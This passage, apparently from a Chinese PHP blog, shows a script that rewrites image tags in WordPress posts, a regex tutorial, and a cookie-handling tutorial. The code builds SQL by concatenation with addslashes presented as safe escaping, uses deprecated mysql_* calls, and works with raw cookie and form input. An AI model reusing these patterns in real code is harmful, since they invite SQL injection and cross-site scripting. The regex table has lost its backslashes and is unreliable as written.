<title>Img标签批量清洗程序</title>
</head><body>';
$img_count = 0;
$sqlc_con = mysql_connect($sqlc_host,$sqlc_user,$sqlc_psw);
mysql_select_db($sqlc_dba,$sqlc_con);
mysql_query("set names UTF8");
$sqlc_inner = mysql_query("SELECT * FROM wp_posts");
while($sqlc_row = mysql_fetch_array($sqlc_inner)) {
	$cid = $sqlc_row['ID'];
	echo "<br />\n".'Post Id => '.$cid."<br />\n";
	$img_change = $sqlc_row['post_content'];
	$img_preg = '/<img src=[^>]+>/';
	preg_match_all($img_preg,$img_change,$img_find);
	$img_count_id = $img_count;
	foreach ($img_find[0] as $value) {
		$img_count++;
		$value_echo = str_ireplace('<','&lt;',$value);
		$value_echo = str_ireplace('>','&gt;',$value_echo);
		echo $value_echo."<br/>\n";
		preg_match("(http://.+\.(jpg|png|JPG|PNG))",$value,$img_url);
		if (isset($img_url[0])) {
			$result = '<img src="'.$img_url[0].'" />';
		}
		else {
			$result = '';
		}
		$result_echo = str_ireplace('<','&lt;',$result);
		$result_echo = str_ireplace('>','&gt;',$result_echo);
		echo $result_echo."<br/>\n";
		str_ireplace("\n","",$value);
		if ($result <> '<img src="" />'&&$cid <> 1887&&$result <> '') {
			$img_change = str_ireplace($value,$result,$img_change);
		}
	}
	echo 'ID Count : '.($img_count - $img_count_id)."<br/>\n";
	$img_change = addslashes($img_change);
	$change = $img_change;
	if (mysql_query("update wp_posts set post_content='".$change."' where id=".$cid."")) {
		echo 'Success ~!';
	}
	else {
		echo "Error : " . mysql_error();
	}
}
echo '<br/>-------------------<br/>Count : '.$img_count;
echo '</body></html>';
mysql_close($sqlc_con);
?>

四. 程序运行原理：

mysql_query("set names UTF8");
//这里将数据库查询时候的字符集设定为 UTF-8，否则得到的数据会是乱码

$img_preg = '/<img src=[^>]+>/';
preg_match_all($img_preg,$img_change,$img_find);
//这里使用正则式将 IMG 标签全部找出来，并把整个标签放到 $img_find 变量里

preg_match("(http://.+.(jpg|png))",$value,$img_url);
//这里把 IMG 标签之中的 URL 提取出来

$result = '<img src="'.$img_url[0].'" />';
if ($result <> '<img src="" />') {
	$img_change = str_ireplace($value,$result,$img_change);
}
//这里把提取之后重新组合的 IMG 标签替换进去

$img_change = addslashes($img_change);
//小邪觉得这个是亮点，这个函数能够让我们把 HTML 代码顺利存储到数据库

五. 程序中使用过的正则式：

$img_preg = "/<img src=[^>]+>/";

> 找到以首先找到 IMG 标签的头部，然后后面的中括号里是一个条件。
> 条件表达的是，这里跟着的字符是除了右尖括号以外的字符。
> 右中括号的后边是个加号，意思是 “重复一次或更多次”。
> 最后以右尖括号作为结尾，这样子就可以捕捉 IMG 标签咯。

$img_url_preg = "(http://.+.(jpg|png))"

> 首先这里两边要用括号，表示包含分枝条件。然后找到以 HTTP:// 开头的字符。
> 接着用 “.” 表示 “匹配除换行符以外的任意字符”，然后用加号标示重复次数。
> 加一个斜杠标示转义字符，就是说后面那个点是普通字符，不是正则式的内容。
> 然后加个括号，里面是分枝条件，标示最后是以 jpg 或者 png 结尾的。

六. 常用的正则式语法：

.	匹配除换行符以外的任意字符
w	匹配字母或数字或下划线或汉字
s	匹配任意的空白符
d	匹配数字
	匹配单词的开始或结束
^	匹配字符串的开始
$	匹配字符串的结束

*	重复零次或更多次
+	重复一次或更多次
?	重复零次或一次
{n}	重复n次
{n,}	重复n次或更多次
{n,m}	重复n到m次

W	匹配任意不是字母，数字，下划线，汉字的字符
S	匹配任意不是空白符的字符
D	匹配任意非数字的字符
B	匹配不是单词开头或结束的位置
[^x]	匹配除了x以外的任意字符
[^aeiou]	匹配除了aeiou这几个字母以外的任意字符

*?	重复任意次，但尽可能少重复
+?	重复1次或更多次，但尽可能少重复
??	重复0次或1次，但尽可能少重复
{n,m}?	重复n到m次，但尽可能少重复
{n,}?	重复n次以上，但尽可能少重复

七. Addslashes 预处理函数：

<?php
$a = "img src="'1''2'20100101/18/59_006.jpg" /";
echo addslashes($a);
?>
//输出 img src=\"\'1\'\'2\'20100101/18/59_006.jpg\" /

> 预处理之后的样子在上面代码框中，这样存储就不会出现错误了。
> 而使用 Phpmyadmin 或者 mysql_query 之类的东东读取数据库的数据。
> 得到的都是预处理前的数据，灰常奇妙 (*^__^*) 嘻嘻。

> 这篇文章大家就和小邪一起学用小甜饼吧，学得好的童鞋，奖励春哥侍寝一晚。
> 话说最近几天的前几篇文章，貌似有点水哈，因为过节的时候小邪也很水 O(∩_∩)O。

1. 了解 Cookie：

> Cookie 常用于识别用户身份，一般用于保存加密的账号和密码，(*^__^*) 。
> Cookies 是由服务器留在用户计算机中的一些信息文本文件所组成。
> 每当相同的计算机通过浏览器请求页面时，它同时会发送出去 Cookie。
> 这样，第二次进入这个网站的时候，就不用保存密码了哟。

2. PHP Cookie 存储与读取：

> 嘻嘻 (^o^)，在这个地方填入你的昵称，然后点击确认按键即可。
> 程序就会将你的昵称存为 Cookie，然后读取并显示出来呢。

> 在 Cookie 失效（10分钟）之前，随便怎样调戏这个程序，都会显示这个样子咯。

> 牛叉的星际传送门 - http://www.evlos.org/apps/demo/cookie

3. 源代码讲解：

<?php
if (isset($_POST['user'])) { //首先检测是否获得了 POST 传递的昵称数据
	$div1 = 'style="display:none;"'; //有则隐藏昵称输入框，此字符串输出于 DIV 标签内
	$div2 = ''; //显示另外一个带欢迎语的显示 Cookie 的 DIV，嘿嘿
	setcookie('cookie_test',$_POST['user'],time()+600); //同时保存昵称为 Cookie
	$show = $_POST['user']; //显示昵称
}
else if (isset($_COOKIE["cookie_test"])) { //检测是否存在昵称Cookie
	$div1 = 'style="display:none;"'; //有则隐藏昵称输入框
	$div2 = ''; //显示一个带欢迎语的显示Cookie的DIV
	$show = $_COOKIE["cookie_test"]; //显示Cookie保存的昵称数据
}
else {
	$div1 = ''; //显示昵称输入框与按键
	$div2 = 'style="display:none;"'; //隐藏显示Cookie的DIV，因为这时无Cookie
	$show = ''; //纯初始化此变量
}
?>

4. 分段讲解：

> 注意！！Setcookie() 函数必须位于 标签之前。

<?php
	setcookie(name, value, expire, path, domain);
	//此函数用于设置 Cookie，Name为变量名，Value为变量值，Expire为存储时间
	//Path为路径，如果需要，一般都为"/"，Domain为作用域，比如设置为".evlos.org"
	//那么此 Cookie 在所有 evlos.org 的子域名下面都是有效的喔
	echo $_COOKIE["user"];
	//显示变量名为 user 的 Cookie 内容
	print_r($_COOKIE);
	//显示所有本站的 Cookies
	setcookie("user", "", time()-3600000);
	//清楚 Cookie，也就是将存储时间变为负值即可
?>

5. WordPress 中的存储 Cookies 的变量：

> WP 程序会自动取出 Cookies 赋值到下面变量中，可以直接用在模板上的。

<?php echo $comment_author; //名称栏 ?>
<?php echo $comment_author_email; //邮箱栏 ?>
<?php echo $comment_author_url; //网址栏 ?>

6. 单独获取WP评论者昵称（站内，模板外）：

> 这个是WP中定义COOKIEHASH常量的代码，嘎嘎 O(∩_∩)O。

/**
 * Used to guarantee unique hash cookies
 * @since 1.5
 */
define('COOKIEHASH', md5(get_option('siteurl')));

echo $_COOKIE['comment_author_'.md5('http://127.0.0.1/wp')];
//所以这样子就可以把 WP 中的评论者名字单独取出来了

> 若是WP安装在 /wp 目录里，那么保存 Cookie 的时候设置的 Path 就是 /wp。
> 也就是说，如果你把上面代码放在 /wp 目录上一层是无效的，比如这里 / 或者 /cookie。

> 牛叉的星际传送门 - http://www.evlos.org/apps/demo/cookie/wp.php